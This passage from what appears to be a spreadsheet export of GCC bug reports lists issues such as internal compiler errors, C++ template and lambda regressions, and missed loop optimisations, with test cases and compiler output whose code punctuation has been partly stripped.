does not work as this is also the case for ALLOCATED(scalar_var) which could only be distinguished using   &amp;&amp; -&gt;name != 
cf. above and intrinsic.c's do_check.
Additionally one needs to update gfc_conv_allocated to support two arguments - scalar and array (which can be also scalar w/o keyword=).</t>
  </si>
  <si>
    <t>GCC-54727</t>
  </si>
  <si>
    <t>[4.8 Regression] error: declaration of â€˜UINT64_Câ€™ must be available</t>
  </si>
  <si>
    <t>r191758 caused (during Firefox build):
...
In file included from /usr/lib/gcc/x86_64-pc-linux-gnu/4.8.0/include/g++-v4/random:51:0
                 from /usr/lib/gcc/x86_64-pc-linux-gnu/4.8.0/include/g++-v4/bits/stl_algo.h:67
                 from /usr/lib/gcc/x86_64-pc-linux-gnu/4.8.0/include/g++-v4/algorithm:63
                 from ../../dist/system_wrappers/algorithm:3
                 from ../../dist/stl_wrappers/algorithm:50
                 from ../../dist/include/shared-libraries.h:14
                 from ../../dist/include/mozilla/Telemetry.h:15
                 from /var/tmp/mozilla-central/xpcom/base/nsMemoryReporterManager.cpp:19:
/usr/lib/gcc/x86_64-pc-linux-gnu/4.8.0/include/g++-v4/bits/opt_random.h: In member function â€˜void std::normal_distribution::__generate(std::normal_distribution::result_type* std::normal_distribution::result_type* _UniformRandomNumberGenerator _RealType = double]â€™:
/usr/lib/gcc/x86_64-pc-linux-gnu/4.8.0/include/g++-v4/bits/opt_random.h:67:57: error: there are no arguments to â€˜UINT64_Câ€™ that depend on a template parameter so a declaration of â€˜UINT64_Câ€™ must be available [-fpermissive]
  constexpr uint64_t __maskval = UINT64_C(0xfffffffffffff)
                                                         ^
/usr/lib/gcc/x86_64-pc-linux-gnu/4.8.0/include/g++-v4/bits/opt_random.h:67:57: note: (if you use â€˜-fpermissiveâ€™ G++ will accept your code but allowing the use of an undeclared name is deprecated)</t>
  </si>
  <si>
    <t>GCC-55418</t>
  </si>
  <si>
    <t>Valgrind: Conditional jump or move depends on uninitialised value(s) in implicitly_declare_fn() method.c:1623</t>
  </si>
  <si>
    <t>Just saw this during a -enable-checking=yesvalgrind build:
 % /var/tmp/gcc_valgrind/usr/local/bin/g++ -std=gnu++11 -c /home/markus/gcc/libstdc++-v3/src/c++11/functexcept.cc
==1267== Conditional jump or move depends on uninitialised value(s)
==1267==    at 0x637C0F: implicitly_declare_fn(special_function_kind tree_node* bool tree_node* tree_node*) (method.c:1623)
==1267==    by 0x6392DF: lazily_declare_fn(special_function_kind tree_node*) (method.c:1894)
==1267==    by 0x63FB74: lookup_fnfields_1(tree_node* tree_node*) (search.c:1441)
==1267==    by 0x63FD3B: lookup_fnfields_slot(tree_node* tree_node*) (search.c:1471)
==1267==    by 0x64367B: lookup_field_r(tree_node* void*) (search.c:1031)
==1267==    by 0x6400CE: dfs_walk_all(tree_node* tree_node* (*)(tree_node* void*) tree_node* (*)(tree_node* void*) void*) (search.c:1572)
==1267==    by 0x6402E7: lookup_member(tree_node* tree_node* int bool int) (search.c:1204)
==1267==    by 0x640640: lookup_fnfields(tree_node* tree_node* int) (search.c:1295)
==1267==    by 0x4DF3B0: build_special_member_call(tree_node* tree_node* vec** tree_node* int int) (call.c:7282)
==1267==    by 0x4E0693: convert_like_real(conversion* tree_node* tree_node* int int bool bool int) (call.c:5718)
==1267==    by 0x4E1D91: build_over_call(z_candidate* int int) (call.c:6867)
==1267==    by 0x4DE229: build_new_method_call(tree_node* tree_node* vec** tree_node* int tree_node** int) (call.c:7668)
==1267== 
Looks like some booleans in implicitly_declare_fn should be initialised.</t>
  </si>
  <si>
    <t>GCC-7911</t>
  </si>
  <si>
    <t>Internal compiler error in force_store_init_value at  cp/typeck2.c:443</t>
  </si>
  <si>
    <t>the compiler just says: (with 2.95.3 it works)
I attach a cpp file that can compiled with
g++ -c -o SD.o SD.cc
SDError.cc: In member function `virtual const char* 
   sdlib::comm::SDError::Fill(const char* const char*)':
SDError.cc:58: Internal compiler error in force_store_init_value at 
   cp/typeck2.c:443
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Release:
gcc-3.2
Environment:
linux 2.4.18 (mandrake 8.2)
How-To-Repeat:
g++ -c -o SD.o SD.cc</t>
  </si>
  <si>
    <t>meno.abels</t>
  </si>
  <si>
    <t>GCC-7833</t>
  </si>
  <si>
    <t>Bug in multiplying int and long when int is too small for result</t>
  </si>
  <si>
    <t xml:space="preserve">	Multiplication of an int with a long results in wrong result
        when the result does not fit into an int.
        The hex output of a large long looks suspicious too!
Release:
3.2.1 20020902 (prerelease)
Environment:
System: Linux keksy 2.4.19 #1 SMP Mon Sep 2 12:45:32 MEST 2002 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc-20020902/configure --prefix=/usr/local/snapshots --enable-languages=f77c++java --disable-threads --enable-shared=libstdc++
How-To-Repeat:
$ cat hello.java
public class hello
{
    final static long a = 1000000000
    final static long b = 1000 * a
    final static long c = 1000L * a
    public static void main(String[] args)
    {
        System.out.println(a =  + a)
        System.out.println(b =  + b)
        System.out.println(c =  + c)
    }
}
$ gcj -o hello hello.java --main=hello
$ ./hello
a = 1000000000
b = -727379968
c = 0xe8d4a51000
Workaround: Use longs (i.e. 1000L instead of 1000 or proper casts).</t>
  </si>
  <si>
    <t>GCC-64505</t>
  </si>
  <si>
    <t>Powerpc compiler generates insn not found for -m32 -mpowerpc64</t>
  </si>
  <si>
    <t>Created attachment 34384
File that shows the problem
Compiling the attached file will generate an insn not found error message if it is compiled with the following options: -std=c99 -fno-strict-aliasing -Wall -m32 -mpowerpc64 foo.c -S -O2.
The problem is inside of rs6000_secondary_reload there is code for 64-bit and 32-bit. The reload insn that is returned is looking for a 64-bit scratch register but the combination of switches -m32 -mpowerpc64 it should be generating a 32-bit scratch register.</t>
  </si>
  <si>
    <t>GCC-18024</t>
  </si>
  <si>
    <t>IOT/Abort trap (core dumped) on AIX with -pthread</t>
  </si>
  <si>
    <t>I'm running on a 32-bit AIX 5.1 box.  GCC 3.3.5 was configured as follows and 
bootstrapped.
# This directory was configured as follows:
/home/downloads/gcc/gcc-3.3.5/configure --with-gcc-version-trigger=/home/downloa
ds/gcc/gcc-3.3.5/gcc/version.c --host=powerpc-ibm-aix5.1.0.0 --enable-threads=po
six --prefix=/usr/local/gcc/gcc-3.3.5 --enable-languages=cc++ --norecursion
When I compile any program that uses -pthread and also throws exceptions 
an IOT/Abort trap (core dumped) occurs.
To reproduce this bug use the following program.
FILE: main.cpp (begin)
int
main(int argc char** argv)
{
  try
  {
    throw bug
  }
  catch(...)
  {
  }
  return 0
}
FILE: main.cpp (end)
* When compiled with g++ main.cpp the application runs fine.  
* When compiled with g++ -pthread main.cpp the error occurs at runtime.  
* When compiled with g++ -lpthread main.cpp the application runs fine.  
However this does not link libgcc_s_pthread which leads to instability in the 
real threaded application.
This bug is similiar to #13391 but 3.3.5 did not contain the patches 
referenced.</t>
  </si>
  <si>
    <t>askees</t>
  </si>
  <si>
    <t>GCC-51022</t>
  </si>
  <si>
    <t>powerpc libgcc static-object.mk error</t>
  </si>
  <si>
    <t>Mon Nov  7 15:16:57 UTC 2011 (revision 181085)
Target: powerpc-rtems4.11 
This happens during the configure phase.  It appears that something in the makefile logic is confused and comes up empty.
Checking multilib configuration for libgcc...
make[2]: Entering directory `/home2/joel/build/b-powerpc-gcc/powerpc-rtems4.11/libgcc'
/users/joel/test-gcc/gcc-svn/libgcc/static-object.mk:18: *** Unsupported file type: .  Stop.
make[2]: Leaving directory `/home2/joel/build/b-powerpc-gcc/powerpc-rtems4.11/libgcc'
make[1]: *** [all-target-libgcc] Error 2
make[1]: Leaving directory `/home2/joel/build/b-powerpc-gcc'
make: *** [all] Error 2</t>
  </si>
  <si>
    <t>GCC-42585</t>
  </si>
  <si>
    <t>[4.5 Regression] SRA is not good for structure copies with one replacement any more</t>
  </si>
  <si>
    <t>From one of the examples from http://embed.cs.utah.edu/embarrassing/dec_09/harvest/gcc-head_llvm-gcc-head/
struct _fat_ptr
{
  unsigned char *curr
  unsigned char *base
  unsigned char *last_plus_one
}
int Cyc_string_ungetc (int ignore struct _fat_ptr *sptr)
int
Cyc_string_ungetc (int ignore struct _fat_ptr *sptr)
{
  struct _fat_ptr *_T0
  struct _fat_ptr *_T1
  struct _fat_ptr _T2
  int _T3
  struct _fat_ptr _ans
  int _change
  {
    _T0 = sptr
    _T1 = sptr
    _T2 = *sptr
    _T3 = -1
    _ans = _T2
    _change = -1
    _ans.curr += 4294967295U
    *sptr = _ans
    return (0)
  }
}
Testing on GCC: (GNU) 4.5.0 20091219
With -O2 this generates only midly inefficient code (although still a bit larger
than llvm's very neat
   8b 44 24 08          	mov    0x8(%esp)%eax
   4:	ff 08                	decl   (%eax)
   6:	31 c0                	xor    %eax%eax
   8:	c3                   	ret    
)
-O2 code:
        subl    $32 %esp
        movl    40(%esp) %eax
        movl    (%eax) %edx
        subl    $1 %edx
        movl    %edx (%eax)
        xorl    %eax %eax
        addl    $32 %esp
        ret
That's a bit dumb because it allocates stack without using it and 
also does not use a subl $1(eax) but explicit load-modify-store but not overly bad (I'll open a separate bug for the load/modify/store)
But with -Os the code is really bad:
    pushl   %edi
        movl    $3 %ecx
        pushl   %esi
        subl    $32 %esp
        movl    48(%esp) %eax
        leal    20(%esp) %edi
        movl    %eax %esi
        rep movsl
        leal    8(%esp) %edi
        leal    20(%esp) %esi
        movl    (%eax) %edx
        movb    $3 %cl
        rep movsl
        leal    8(%esp) %esi
        movl    %eax %edi
        decl    %edx
        movb    $3 %cl
        rep movsl
        movl    %edx (%eax)
        addl    $32 %esp
        xorl    %eax %eax
        popl    %esi
        popl    %edi
        ret
It doesn't modify the object in place but instead copies it around.
Unsurprisingly that generates that much larger (and slower code)</t>
  </si>
  <si>
    <t>GCC-50759</t>
  </si>
  <si>
    <t>[4.7 Regression] @table ended by @end quotation at line 595</t>
  </si>
  <si>
    <t>On Linux/x86 revision 180099 gave
@table ended by @end quotation at line 595
@table ended by @end quotation at line 595
make[6]: [cpp.pod] Error 25 (ignored)
make[6]: [gcc.pod] Error 25 (ignored)</t>
  </si>
  <si>
    <t>GCC-3592</t>
  </si>
  <si>
    <t>[mn10200-elf] GCC 3.0-CVS ICE</t>
  </si>
  <si>
    <t>Fails with following messages
usr3/ftp_archive/gnu/gcc/ss/b3/b-mn10200-elf/gcc/xgcc -B/usr3/ftp_archive/gnu/gcc/ss/b3/b-mn10200-elf/gcc/ -nostdinc -B/usr3/ftp_archive/gnu/gcc/ss/b3/b-mn10200-elf/mn10200-elf/newlib/ -isystem /usr3/ftp_archive/gnu/gcc/ss/b3/b-mn10200-elf/mn10200-elf/newlib/targ-include -isystem /usr3/ftp_archive/gnu/gcc/ss/b3/gcc/newlib/libc/include -B/opt/gnucross/mn10200-elf/bin/ -B/opt/gnucross/mn10200-elf/lib/ -isystem /opt/gnucross/mn10200-elf/include -O2  -DCROSS_COMPILE -DIN_GCC    -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -isystem ./include  -DDF=SF -DDI=SI -g1  -DIN_LIBGCC2 -D__GCC_FLOAT_NOT_NEEDED -Dinhibit_libc -I. -I. -I../../gcc/gcc -I../../gcc/gcc/. -I../../gcc/gcc/config -I../../gcc/gcc/../include  -DL_divdi3 -c ../../gcc/gcc/libgcc2.c -o libgcc/./_divdi3.o
../../gcc/gcc/libgcc2.c: In function `__divsi3':
../../gcc/gcc/libgcc2.c:748: Internal compiler error in update_equiv_regs at local-alloc.c:1097
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[2]: *** [libgcc/./_divdi3.o] Error 1
Release:
gcc 3.0-CVS
Environment:
GNU/Linux x86 (RedHat 6.2) with binutils 2.11.2 for target
How-To-Repeat:
Configure and build as follows:
../gcc/configure --target=${1} \
     --with-gnu-as --with-gnu-ld --with-newlib --verbose \
    --prefix=/opt/gnucross '--enable-languages=cc++' &amp;&amp; make 
Contact me for assistance with binutils.</t>
  </si>
  <si>
    <t>GCC-14965</t>
  </si>
  <si>
    <t>Missing template keyword after scope operator leading to weird error meybe even segfault</t>
  </si>
  <si>
    <t>The enclosed example program fails to be legal C++ because of a missing
'template' keyword after a scope operator ::. However the error message
emitted by g++ 3.3.3 is completely wrong and a similar mistake in a
program of several 10000 lines of code even causes an internal compiler
error (segmentation fault) which I could not reproduce in a short example.
I'm reporting the small example because I suspect that both problems are
effects of the same cause.
Thank you in advance.
Error message:
example.C: In member function `void Example::f() [with Type_traits
   = Int_traits]':
example.C:37:   instantiated from here
example.C:30: error: no match for call to `(
   C::Fortytwo_functor) (C&amp;)'
example.C:7: error: candidates are: TArg2
   C::Fortytwo_functor::operator()(C) [with TArg2 = int
   TArg1 = Int_traits]
(Notice that the template argument to C is reported wrongly every time.)
Complete source code:
template 
class C {
public:
    template 
    class Fortytwo_functor {
    public:
        TArg2 operator() (C) { return TArg2(42) }
    }
}
class Int_traits {
public:
    typedef int Chosen_type
}
template 
class Example {
public:
    typedef typename Type_traits::Chosen_type T
    void f() {
        typedef C My_C
        My_C c
// this version compiles correctly
//        typename My_C::template Fortytwo_functor ftf
// this version exposes the problem:
        typename My_C::Fortytwo_functor ftf
        int ft= ftf(c)
    }
}
int main(int char**) {
    typedef Example Example
    Example ex
    ex.f()
    return 0
}
// EOF
Complete compiler argument and version information:
gcc-3.3.3 example.C -o example -lstdc++ -L/usr/local/gcc-3.3/gcc-3.3.3/lib
-Wl-R/usr/local/gcc-3.3/gcc-3.3.3/lib -save-temps -v
Reading specs from
/usr/local/gcc-3.3/gcc-3.3.3/lib/gcc-lib/i686-pc-linux-gnu/3.3.3/specs
Configured with: ./configure --prefix=/usr/local/gcc-3.3/gcc-3.3.3
--program-suffix=-3.3.3 --enable-languages=cc++ : (reconfigured) ./configure
--prefix=/usr/local/gcc-3.3/gcc-3.3.3 --program-suffix=-3.3.3
--enable-languages=cc++ : (reconfigured) ./configure
--prefix=/usr/local/gcc-3.3/gcc-3.3.3 --program-suffix=-3.3.3
--enable-languages=cc++
Thread model: posix
gcc version 3.3.3</t>
  </si>
  <si>
    <t>GCC-4267</t>
  </si>
  <si>
    <t>Internal compiler error in prepare_float_lib_cmp at optabs.c</t>
  </si>
  <si>
    <t xml:space="preserve">	ng++ -mcpu=athlon -march=athlon -O6 -fomit-frame-pointer -ffast-math -funroll-loops -malign-loops=5 -malign-jumps=5 -malign-functions=5 -mpreferred-stack-boundary=5 -mfancy-math-387 -Wall -Werror -D_REENTRANT -D_THREAD_SAFE -D_ISOC9X_SOURCE -DX86 -DUSE_MEMMOVE -I. -c DSPOp.cc  -fPIC -DPIC -o .libs/DSPOp.lo
	DSPOp.cc: In member function `void clDSPOp::Clip(float* const float* float
	   long int)':
	   DSPOp.cc:1686: Internal compiler error in prepare_float_lib_cmp at optabs.c:
	      3531
void clDSPOp::Clip (float *fpDest const float *fpSrc float fValue
    long lCount)
{
    long lLoopCntr
    for (lLoopCntr = 0L lLoopCntr &lt; lCount lLoopCntr++)
    {
        #ifndef _ISOC9X_SOURCE
            fpDest[lLoopCntr] = (fpSrc[lLoopCntr] &gt; fValue) ?
                fValue : fpSrc[lLoopCntr]
        #else
            fpDest[lLoopCntr] = (isgreater(fpSrc[lLoopCntr] fValue)) ?
                fValue : fpSrc[lLoopCntr]
        #endif
    }
}
Release:
3.0.2 20010907 (prerelease)
Environment:
System: Linux vaarlahti 2.4.9-ac3 #7 Sat Sep 1 20:46:52 EEST 2001 i686 unknown
Architecture: i686/athlon
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc/configure --prefix=/usr/local --exec-prefix=/usr/local --with-local-prefix=/usr/local --enable-shared --enable-threads=posix --enable-languages=cc++f77 --enable-version-specific-runtime-libs
How-To-Repeat:
preprocessor output:
void clDSPOp::Clip (float *fpDest const float *fpSrc float fValue
    long lCount)
{
    long lLoopCntr
    for (lLoopCntr = 0L lLoopCntr &lt; lCount lLoopCntr++)
    {
        fpDest[lLoopCntr] = (( ({ __typeof__(fpSrc[lLoopCntr]) __x = (fpSrc[lLoopCntr]) __typeof__(fValue) __y = (fValue) !( ({ __typeof__(__x) __u = (__x) __typeof__(__y) __v = (__y) (sizeof (__u) == sizeof (float) ? __fpclassifyf
        (__u) : sizeof (__u) == sizeof (double) ? __fpclassify (__u) : __fpclassifyl (__u)) == FP_NAN || (sizeof (__v) == sizeof (float) ? __fpclassifyf (__v) : sizeof
        (__v) == sizeof (double) ? __fpclassify (__v) : __fpclassifyl (__v)) == FP_NAN
        }))  }))) ?
        fValue : fpSrc[lLoopCntr]
    }
}</t>
  </si>
  <si>
    <t>GCC-11624</t>
  </si>
  <si>
    <t>-Wnon-virtual-dtor doesn't always work</t>
  </si>
  <si>
    <t>I just closed a PR that had essentially this code:
------------------------------------
struct A
{
  virtual void afunc () {}
}
struct B
{
  virtual void bfunc () {}
}
struct C : A B
{}
int main (void)
{
  B * Bptr = new C()
  delete Bptr
}
----------------------------
What was wrong with that PR is immaterial here but one of the things
is that the submitter didn't recognize that he should have a virtual
destructor. That's what we have -Wnon-virtual-dtor for I thought since
it says:
-----------------------------------
@item -Wnon-virtual-dtor @r{(C++ only)}
@opindex Wnon-virtual-dtor
Warn when a class appears to be polymorphic thereby requiring a virtual
destructor yet it declares a non-virtual one.
This warning is enabled by @option{-Wall}.
-----------------------------------
Alas this option doesn't trigger on above code for no version after 3.2.
(I don't have an older version on my present system so can't check.) I
think it should though shouldn't it?
W.</t>
  </si>
  <si>
    <t>GCC-53484</t>
  </si>
  <si>
    <t>[4.7/4.8 Regression] [c++11] Wrong auto in lambdas in function templates</t>
  </si>
  <si>
    <t>In the following program auto is deduced to be int&amp; while int is expected.
template 
void f(T x){
   [&amp;]{
       std::cout &lt;&lt; x &lt;&lt; std::endl
       auto y = x
       y = 100
       std::cout &lt;&lt; x &lt;&lt; std::endl
   }()
}
int main(){ f(0) }
output:
0
100
In non-template functions it doesn't occur.
------------
revision r187865
Using built-in specs.
COLLECT_GCC=g++
COLLECT_LTO_WRAPPER=/home/user/gcc-trunk/libexec/gcc/x86_64-unknown-linux-gnu/4.8.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../gcc-trunk/configure --prefix=/home/user/gcc-trunk --disable-bootstrap --disable-multilib --enable-languages=cc++fortran --with-gmp=/home/user/gcc-trunk/src/build/backends --with-mpfr=/home/user/gcc-trunk/src/build/backends --with-mpc=/home/user/gcc-trunk/src/build/backends
Thread model: posix
gcc version 4.8.0 20120525 (experimental) (GCC)</t>
  </si>
  <si>
    <t>GCC-62212</t>
  </si>
  <si>
    <t>[5 Regression] ICE compiling template function with array reference parameter whose size depends on a template parameter</t>
  </si>
  <si>
    <t>I get an ICE in gcc 4.8.1 and also on 4.9 when compiling the code below. Doesn't matter the optimization level or what -std=:
============================
typedef int my_int
template
struct X {
    enum {value = 1}
}
template
void f(const my_int(
int main() {
    const my_int a[1] = {}
    f(a)
}
============================
$ g++ -v -c t.cpp
Using built-in specs.
COLLECT_GCC=/usr/local/gcc48/bin/g++
Target: x86_64-unknown-linux-gnu
Configured with: ./configure --enable-threads=posix --enable-__cxa_atexit --prefix=/usr/local/gcc-4.8.1
Thread model: posix
gcc version 4.8.1 (GCC)
COLLECT_GCC_OPTIONS='-v' '-c' '-shared-libgcc' '-mtune=generic' '-march=x86-64'
 /usr/local/gcc-4.8.1/libexec/gcc/x86_64-unknown-linux-gnu/4.8.1/cc1plus -quiet -v -D_GNU_SOURCE t.cpp -quiet -dumpbase t.cpp -mtune=generic -march=x86-64 -auxbase t -version -o /tmp/ccbr6RST.s
GNU C++ (GCC) version 4.8.1 (x86_64-unknown-linux-gnu)
	compiled by GNU C version 4.8.1 GMP version 4.3.2 MPFR version 2.4.2-p1 MPC version 0.8.1
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
ignoring nonexistent directory /usr/local/gcc-4.8.1/lib/gcc/x86_64-unknown-linux-gnu/4.8.1/../../../../x86_64-unknown-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /usr/local/gcc-4.8.1/lib/gcc/x86_64-unknown-linux-gnu/4.8.1/../../../../include/c++/4.8.1
 /usr/local/gcc-4.8.1/lib/gcc/x86_64-unknown-linux-gnu/4.8.1/../../../../include/c++/4.8.1/x86_64-unknown-linux-gnu
 /usr/local/gcc-4.8.1/lib/gcc/x86_64-unknown-linux-gnu/4.8.1/../../../../include/c++/4.8.1/backward
 /usr/local/gcc-4.8.1/lib/gcc/x86_64-unknown-linux-gnu/4.8.1/include
 /usr/local/include
 /usr/local/gcc-4.8.1/include
 /usr/local/gcc-4.8.1/lib/gcc/x86_64-unknown-linux-gnu/4.8.1/include-fixed
 /usr/include
End of search list.
GNU C++ (GCC) version 4.8.1 (x86_64-unknown-linux-gnu)
	compiled by GNU C version 4.8.1 GMP version 4.3.2 MPFR version 2.4.2-p1 MPC version 0.8.1
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
Compiler executable checksum: 9381368e685e312c931bb6a2db2d568c
t.cpp: In instantiation of 'void f(const my_int ( my_int = int]':
t.cpp:13:15:   required from here
t.cpp:9:6: internal compiler error: Segmentation fault
 void f(const my_int(
      ^
0x89ffef crash_signal
	../.././gcc/toplev.c:332
0x72a8c7 fold_convert_loc(unsigned int tree_node* tree_node*)
	../.././gcc/fold-const.c:1879
0x72e648 associate_trees
	../.././gcc/fold-const.c:891
0x71d534 fold_binary_loc(unsigned int tree_code tree_node* tree_node* tree_node*)
	../.././gcc/fold-const.c:10589
0x72768a fold_build2_stat_loc(unsigned int tree_code tree_node* tree_node* tree_node*)
	../.././gcc/fold-const.c:14877
0x7195ce fold_binary_loc(unsigned int tree_code tree_node* tree_node* tree_node*)
	../.././gcc/fold-const.c:9934
0x72768a fold_build2_stat_loc(unsigned int tree_code tree_node* tree_node* tree_node*)
	../.././gcc/fold-const.c:14877
0x89ac30 layout_type(tree_node*)
	../.././gcc/stor-layout.c:2230
0xa0aaa3 build_array_type_1
	../.././gcc/tree.c:7490
0x5add1f build_cplus_array_type(tree_node* tree_node*)
	../.././gcc/cp/tree.c:811
0x5af08e cp_build_qualified_type_real(tree_node* int int)
	../.././gcc/cp/tree.c:1000
0x5bd2a0 canonicalize_for_substitution
	../.././gcc/cp/mangle.c:364
0x5bd2a0 write_type
	../.././gcc/cp/mangle.c:1886
0x5bd61d write_type
	../.././gcc/cp/mangle.c:2052
0x5be6ff write_method_parms
	../.././gcc/cp/mangle.c:2496
0x5be7fd write_bare_function_type
	../.././gcc/cp/mangle.c:2438
0x5bbaff write_mangled_name
	../.././gcc/cp/mangle.c:689
0x5c145d mangle_decl_string
	../.././gcc/cp/mangle.c:3431
0x5c15d8 get_mangled_id
	../.././gcc/cp/mangle.c:3453
0x5c15d8 mangle_decl(tree_node*)
	../.././gcc/cp/mangle.c:3476
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
============================
It seems to be related to my_int being a typedef... if you change it to
#define my_int int
then it works fine.
Also if I intentionally give it the wrong sort of array then it gives the correct error message and does not ICE e.g. if I change the type to const double a[1] = {} then i get:
t.cpp: In function 'int main()':
t.cpp:13:14: error: no matching function for call to 'f(const double [1])'
     f(a)
              ^
t.cpp:13:14: note: candidate is:
t.cpp:9:6: note: template void f(const my_int (&amp;)[X::value])
 void f(const my_int(
      ^
t.cpp:9:6: note:   template argument deduction/substitution failed:
t.cpp:13:14: note:   cannot convert 'a' (type 'const double [1]') to type 'const my_int (&amp;)[1] {aka const int (&amp;)[1]}'
     f(a)
And similarly if I make the array the wrong size larger than expected it also gives the correct error. But when the parameter matches and the type in the declaration of f is a typedef then I get the ICE.
Thanks!
-lewis</t>
  </si>
  <si>
    <t>GCC-77748</t>
  </si>
  <si>
    <t>pr77550.C fails on arm-none-eabi</t>
  </si>
  <si>
    <t>Hi
As discussed at https://gcc.gnu.org/ml/gcc-patches/2016-09/msg01878.html
here is a new PR: the testcase pr77550.C fails at execution time
for target arm-none-eabi (as opposed to arm-*linux*).
I'm attaching the preprocessed file and assembler code.</t>
  </si>
  <si>
    <t>GCC-42720</t>
  </si>
  <si>
    <t>Problematic condition simplification logic at unswitch-loops pass</t>
  </si>
  <si>
    <t>The bug is triggered with -O2 -fprofile-use.
test case loop.cpp:
int fun_b(int hbs[] int num void *obj) {
 int i
 int s = 0
 for (i = 0 i &lt; num i++) {
   if (obj != 0) {
     if ((int)obj - hbs[i] &gt; 0) {
       s += hbs[i]
     }
   }
 }
 return s
}
int main () {
 int i
 int s = 0
 int hbs[100]
 for (i = 0 i &lt; 100 ++i) {
   hbs[i] = i * 2000 + 100000
 }
 for (i = 0 i &lt; 20 ++i) {
   s += fun_b (hbs 100 
 }
 return s
}
Profile the program. Apparently the loop inside fun_b() is hot.
$arm-eabi-g++ loop.cpp -O2 -fprofile-use --save-temps -c -o loop.o
We we see an empty loop (.L5) if obj==0 in function fun_b.
_Z5fun_bPiiPv:
       @ args = 0 pretend = 0 frame = 0
       @ frame_needed = 0 uses_anonymous_args = 0
       @ link register save eliminated.
       cmp     r1 #0
       stmfd   sp! {r4 r5}
       mov     r3 r0
       ble     .L57
       cmp     r2 #0   &lt;--- if (obj != 0) is moved out of loop
       beq     .L5
     ....
.L3:
       ldmfd   sp! {r4 r5}
       bx      lr
.L5:                       if (obj == 0) empty loop
       add     r2 r2 #1    
       cmp     r2 r1        
       bne     .L5           
.L57:
       mov     r0 #0
       b       .L3
The empty loop (.L5) should have been eliminated. I have tested -O2 without -fprofile-use where the empty loop is gone.
I find that the root cause of the inefficiency of -O2 FDO is that during unswitch-loops the simplification of loop conditions is missed when FDO is on. 
Let's say
Version A: -O2 -funswitch-loops which does right thing.
Version B: -O2 -fprofile-use. Version B generates an empty loop which should be eliminated.
Before switch-loop pass the loop (inner-most hot) is
 loop {
    if (obj != 0) {
      ...
    }
  }
Both version A and version B perform one pass of unswitch-loop on this loop body.
In function tree_unswitch_single_loop()
after nloop = tree_unswitch_loop (loop bbs[i] cond) the loop becomes
if (obj != 0) {
 loop {               &lt;---- original copy of the loop
   if (obj != 0) {
     ...
   }
 }
} else {
 loop {              &lt;----- nloop: a new copy of the loop
    if (obj != 0) {
      ...
    }
  }
}
Then right before the end of tree_unswitch_single_loop() gcc recursively calls itself on modified loops.
  tree_unswitch_single_loop (nloop num + 1)
From here Version A and Version B starts to perform differently.
For Version A (-O2 -funswitch-loops) gcc conditions looking for unswitch-loop opportunity in the new loop nloop.
It finds that the condition of the new loop can be simplified. Since obj is 0 when it comes to the new loop gcc
replaces obj by 0. Thus the loop becomes
if (obj != 0) {
 loop {               &lt;---- original copy of the loop
   if (obj != 0) {
     ...
   }
 }
} else {
 loop {                   &lt;----- nloop: a new copy of the loop
    if (0 != 0) {     &lt;--- obj is replaced by 0
      ...
    }
  }
}
Therefore in the TODO pass cleanup-cfg the nloop is entirely removed.
However for Version B (-O2 -fprofile-use) gcc finds that the nloop is a cold loop so it returns immediately without checking if the condition can be simplified. Thus nloop is not cleaned up by the following cleanup-cfg pass and results in an empty loop.
The problematic code in is unswitch_single_loop() in loop-unswitch.c.
static void
unswitch_single_loop(struct loop *loop ...)
{ ...
  /* Do not unswitch in cold areas.  */
  if (optimize_loop_for_size_p (loop))
    {
       dump
       return
     }
  ...
  do
    {   ...
       /* Check whether the result can be predicted.  */
       for (acond = cond_checked acond acond = XEXP (acond 1))
           simplify_using_condition (XEXP (acond 0) 
          ...
      } while (repeat)
    ...
  /* Unswitch the loop on this condition.  */
  nloop = unswitch_loop (loop bbs[i] cond cinsn)
  ...
  /* Invoke itself on modified loops.  */
  unswitch_single_loop (nloop rconds num + 1)
  unswitch_single_loop (loop conds num + 1)
  ...
}
To fix the empty loop problem my thought is to propagate the conditions immediately after nloop is inserted.
Any suggestion?
Thanks
Jing</t>
  </si>
  <si>
    <t>jingyu</t>
  </si>
  <si>
    <t>GCC-40079</t>
  </si>
  <si>
    <t>[4.5 Regression]  Revision 147294 caused extra failures</t>
  </si>
  <si>
    <t>On Linux/ia32 revision 147294:
http://gcc.gnu.org/ml/gcc-cvs/2009-05/msg00268.html
caused
FAIL: /export/gnu/import/svn/gcc-test/bld/i686-pc-linux-gnu/libjava/testsuite/TestLeak.exe execution - /export/gnu/import/svn/gcc-test/bld/i686-pc-linux-gnu/libjava/testsuite/TestLeak.exe
FAIL: g++.dg/opt/thunk3.C (test for excess errors)</t>
  </si>
  <si>
    <t>GCC-61198</t>
  </si>
  <si>
    <t>Crash when selecting specializations through aliases.</t>
  </si>
  <si>
    <t>Using built-in specs.
COLLECT_GCC=g++
COLLECT_LTO_WRAPPER=/usr/lib/gcc/i686-pc-cygwin/4.8.2/lto-wrapper.exe
Target: i686-pc-cygwin
